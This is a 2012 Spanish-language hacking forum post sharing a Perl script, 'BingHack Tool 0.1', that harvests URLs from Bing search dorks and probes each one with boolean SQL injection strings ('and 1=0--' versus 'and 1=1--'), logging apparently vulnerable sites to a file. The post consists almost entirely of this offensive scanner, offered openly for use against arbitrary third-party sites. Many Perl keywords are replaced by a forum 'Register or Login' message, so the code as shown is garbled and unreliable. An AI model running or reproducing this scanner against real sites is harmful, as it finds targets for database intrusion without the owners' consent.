send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] BingHack Tool 0.1

  • 0 Respuestas
  • 870 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 544
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Mayo 26, 2012, 09:05:25 am »
Un simple script en perl para buscar paginas vulnerables a SQLi usando Bing.

El codigo

Código: Perl
  1. #!usr/bin/perl
  2. #BingHack Tool 0.1
  3. #Coded By Doddy H
  4.  
  5. use LWP::UserAgent;
  6.  
  7. my $nave = LWP::UserAgent->new;
  8. $nave->agent(
  9. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
  10. );
  11. $nave->timeout(5);
  12.  
  13. head();
  14. You are not allowed to view links. Register or Login "\n\n[+] Dork : ";
  15. You are not allowed to view links. Register or Login( my $dork = <stdin> );
  16. You are not allowed to view links. Register or Login "\n[+] Pages : ";
  17. You are not allowed to view links. Register or Login( my $pags = <stdin> );
  18. You are not allowed to view links. Register or Login "\n[+] Searching ...\n";
  19. my @urls = bing( $dork, $pags );
  20. You are not allowed to view links. Register or Login "\n[+] Pages Found : " . You are not allowed to view links. Register or Login(@urls) . "\n";
  21. You are not allowed to view links. Register or Login "\n[+] Scanning ...\n\n";
  22.  
  23. for my $pa (@urls) {
  24.     sql($pa);
  25. }
  26. You are not allowed to view links. Register or Login "\n[+] Finished\n";
  27.  
  28. copyright();
  29.  
  30. sub sql {
  31.     my ( $pass1, $pass2 ) = ( "+", "--" );
  32.     my $page = You are not allowed to view links. Register or Login;
  33.  
  34.     my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
  35.     my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
  36.  
  37.     unless ( $testar1 eq $testar2 ) {
  38.         You are not allowed to view links. Register or Login "[+] SQLI : $page\a\n";
  39.         savefile( "sql-logs.txt", $page );
  40.     }
  41. }
  42.  
  43. sub savefile {
  44.     You are not allowed to view links. Register or Login( SAVE, ">>" . $_[0] );
  45.     You are not allowed to view links. Register or Login SAVE $_[1] . "\n";
  46.     You are not allowed to view links. Register or Login SAVE;
  47. }
  48.  
  49. sub bing {
  50.  
  51.     my ( $a, $b ) = @_;
  52.     for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
  53.         my $code =
  54.           toma( "http://www.bing.com/search?q=" . $a . "&first=" . $pages );
  55.  
  56.         while ( $code =~ /<h3><a href="(.*?)"/mig ) {
  57.             You are not allowed to view links. Register or Login( @founds, $1 );
  58.         }
  59.     }
  60.     my @founds = repes( cortar(@founds) );
  61.     You are not allowed to view links. Register or Login @founds;
  62. }
  63.  
  64. sub repes {
  65.     my @limpio;
  66.     foreach $test (@_) {
  67.         You are not allowed to view links. Register or Login @limpio, $test unless $repe{$test}++;
  68.     }
  69.     You are not allowed to view links. Register or Login @limpio;
  70. }
  71.  
  72. sub cortar {
  73.     my @nuevo;
  74.     for (@_) {
  75.         if ( $_ =~ /=/ ) {
  76.             @tengo = You are not allowed to view links. Register or Login( "=", $_ );
  77.             You are not allowed to view links. Register or Login( @nuevo, @tengo[0] . "=" );
  78.         }
  79.         else {
  80.             You are not allowed to view links. Register or Login( @nuevo, $_ );
  81.         }
  82.     }
  83.     You are not allowed to view links. Register or Login @nuevo;
  84. }
  85.  
  86. sub head {
  87.     You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login(
  88.  
  89.  @@@@   @             @    @              @        @@@@@              @
  90.  @   @                @    @              @          @                @
  91.  @   @                @    @              @          @                @
  92.  @   @  @ @ @@   @@@@ @    @   @@@   @@@  @  @       @     @@@   @@@  @
  93.  @@@@   @ @@  @ @   @ @@@@@@      @ @   @ @ @        @    @   @ @   @ @
  94.  @   @  @ @   @ @   @ @    @   @@@@ @     @@         @    @   @ @   @ @
  95.  @   @  @ @   @ @   @ @    @  @   @ @     @ @        @    @   @ @   @ @
  96.  @   @  @ @   @ @   @ @    @  @   @ @   @ @  @       @    @   @ @   @ @
  97.  @@@@   @ @   @  @@@@ @    @   @@@@  @@@  @   @      @     @@@   @@@  @
  98.                     @                                                  
  99.                 @@@@                                                  
  100.  
  101. );
  102. }
  103.  
  104. sub copyright {
  105.     You are not allowed to view links. Register or Login "\n\n-- == (C) Doddy Hackman 2012\n\n";
  106.     <stdin>;
  107.     You are not allowed to view links. Register or Login(1);
  108. }
  109.  
  110. sub toma {
  111.     You are not allowed to view links. Register or Login $nave->get( $_[0] )->content;
  112. }
  113.  
  114. # The End ?
  115.  
« Última modificación: Marzo 14, 2015, 10:21:27 am por Expermicid »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 2850
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1322
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Search in google for scan SQLI

Iniciado por BigBear

Respuestas: 0
Vistas: 1078
Último mensaje Julio 03, 2011, 09:49:49 pm
por BigBear
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 968
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1471
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d